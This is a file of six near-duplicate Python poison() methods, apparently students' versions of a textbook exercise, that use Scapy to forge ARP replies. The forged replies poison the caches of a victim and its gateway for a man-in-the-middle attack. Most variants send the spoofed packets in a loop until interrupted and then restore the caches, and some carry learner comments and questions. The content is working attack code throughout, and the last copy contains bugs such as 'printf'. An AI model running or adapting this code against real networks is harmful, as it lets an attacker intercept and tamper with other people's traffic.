def poison(self): # 1) Setting-up/initializing details of victim. Will run/send packets later, in step 3. # poison_victim is my variable but it takes on the FUNCTION ARP() poison_victim = ARP() poison_victim.op = 2 # Question. ( the other op we saw was op='who-is') # I determine the SOURCE IP of the packet, as the gateway !! - Sneaky poison_victim.psrc = self.gateway # why preceded by 'p' in pdst and psrc ?? poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print( f'ip src: {poison_victim.psrc} (ie the gateway - not my machine!') print(f'ip dst: {poison_victim.pdst}') print(f'mac dst: {poison_victim.hwdst}') print(f'mac src: {poison_victim.hwsrc}' ) # Question: shouldn't this be set - it was not set yet. print(poison_victim.summary()) print('-' * 30) # 2) Setting-up/initializing details of gateway. Will run/send packets later, in step 3. poison_gateway = ARP() poison_gateway.op = 2 # Question. ( the other op we saw was op='who-is') # I determine the SOURCE of the packet, as the victim/target !! - Sneaky poison_gateway.psrc = self.victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'ip src: {poison_gateway.psrc}') print(f'ip dst: {poison_gateway.pdst}') print(f'mac dst: {poison_gateway.hwdst}') print(f'mac_src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('-' * 30) # 3) print( f'Beginning the ARP poison (ie sending the packets).Ffor 45 seconds.' ) t_end = time.time() + 45 # 45 seconds while time.time() < t_end: #while True: # keep running the poison all the while we need to eavesdrop - until KeyboardInterrupt of ^C sys.stdout.write(str(time.strftime("%H:%M:%S")) + "~") sys.stdout.flush() #try: send(poison_victim) send(poison_gateway) # 4) # except KeyboardInterrupt: # self.restore() # sys.exit() # print('Performed "sys.exit()"') #else: time.sleep(2) self.restore()
def poison(self): poison_victim = ARP() poison_victim.op = 2 poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print(f'ip src: {poison_victim.psrc}') print(f'ip dst: {poison_victim.pdst}') print(f'mac dst: {poison_victim.hwdst}') print(f'mac src: {poison_victim.hwsrc}') print('-' * 30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self.victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'ip src: {poison_gateway.psrc}') print(f'ip dst: {poison_gateway.pdst}') print(f'mac dst: {poison_gateway.hwdst}') print(f'mac src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('-' * 30) print(f'Beginning the ARP posion. [Ctrl-c to stop]') while True: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2)
def poison(self): '''Create poisoned packets and send them to the victim and the gateway''' poison_victim = ARP() poison_victim.op = 2 # ARP Reply poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victimmac print(f'Gateway, IP source: {poison_victim.psrc}' ) # Gateway's IP address print(f'Victim, IP destiantion: {poison_victim.pdst}') print(f'ATTACKER, MAC source: {poison_victim.hwsrc}' ) # Attacker's MAC address print(f'Victim, MAC destination: {poison_victim.hwdst}') print(poison_victim.summary()) print('~*~' * 15) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self.victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gatewaymac print(f'Victim, IP source: {poison_gateway.psrc}' ) # Victim's IP address print(f'Gateway, IP destiantion: {poison_gateway.pdst}') print(f'ATTACKER, MAC source: {poison_gateway.hwsrc}' ) # Attacker's MAC address print(f'Gateway, MAC destination: {poison_gateway.hwdst}') print(poison_gateway.summary()) print('><(((º> ' * 15) print(f'Begin the ARP poison. [CTRL-C to stop]') # Respective's ARP caches entires remain posioned while True: # Dynamic packet printing: sys.stdout.write('.') # Waiting on the terminal sys.stdout.flush( ) # Flushes out the stdout buffer: it'll write everything in the buffer to the terminal try: # Attacker's NIC should allow IP Forwarding send(poison_victim) send(poison_gateway) except KeyboardInterrupt: # Restore ARP cache entires self.restore() sys.exit() else: time.sleep(2)
def poison(self): """ simple ARP poisoner. - sets data up to poison victim and the gateway. - first creates a poisoned ARP packet for the victim. - second creates a poisoned ARP packet for the gateway. - poisons the gateway by sending it to the victims IP address but uses the attacker's MAC address. - poisons the victim by sending the gateways IP address but the attacker's MAC address. [!] this program loops all of the above until the user cancels. [!] [*] to stop loop CTRL-C [*] """ poison_victim = ARP() poison_victim.op = 2 poison_victim.psrc = self.gateway poison_victim.pdst = self.victim poison_victim.hwdst = self.victim_mac print(f'IP src: {poison_victim.psrc}') print(f'IP dst: {poison_victim.pdst}') print(f'MAC dst: {poison_victim.hwdst}') print(f'MAC src: {poison_victim.hwsrc}') print(poison_victim.summary()) print('-'*30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self.victim poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gateway_mac print(poison_gateway.summary()) print('-'*30) print(f'Beginning the ARP poison. [CTRL-C to stop]') while True: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2)
def poison(self): poison_victim = ARP() poison_victim.op = 2 poison_victim.psrc = self.gateway_ip poison_victim.pdst = self.victim_ip poison_victim.hwdst = self.victim_mac print(f'IP source: {poison_victim.psrc}') print(f'MAC source: {poison_victim.hwsrc}') print(f'IP destination: {poison_victim.pdst}') print(f'MAC destination: {poison_victim.hwdst}') print(poison_victim.summary()) print('-' * 30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self.victim_ip poison_gateway.pdst = self.gateway_ip poison_gateway.hwdst = self.gateway_mac print(f'IP source: {poison_gateway.psrc}') print(f'MAC source: {poison_gateway.hwsrc}') print(f'IP destination: {poison_gateway.pdst}') print(f'MAC destination: {poison_gateway.hwdst}') print(poison_gateway.summary()) print('-' * 30) print('Beginning the ARP poison. [CTRL-C to stop]') while True: sys.stdout.write('.') sys.stdout.flush() try: send(poison_victim) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2)
def poison(self): poison_target = ARP() poison_target.op = 2 poison_target.psrc = self.gateway poison_target.pdst = self.target poison_target.hwdst = self.target_mac printf(f'IP Src: {poison_target.psrc}') printf(f'IP Dst: {poison_target.dst}') printf(f'MAC Dst: {poison_target.hwdst}') printf(f'MAC Src: {poison_target.hwsrc}') print(poison_target.summary()) print('-' * 30) poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = self.target poison_gateway.pdst = self.gateway poison_gateway.hwdst = self.gateway_mac printf(f'IP Src: {poison_gateway.psrc}') printf(f'IP Dst: {poison_gateway.dst}') printf(f'MAC Dst: {poison_gateway.hwdst}') printf(f'MAC Src: {poison_gateway.hwsrc}') print(poison_gateway.summary()) print('-' * 30) print(f'Beginning ARP Poison. [Press Ctrl-C to stop]') while time.time() < TIME_LIMIT: sys.stdout.write('.') sys.stdout.flush() try: send(poison_target) send(poison_gateway) except KeyboardInterrupt: self.restore() sys.exit() else: time.sleep(2)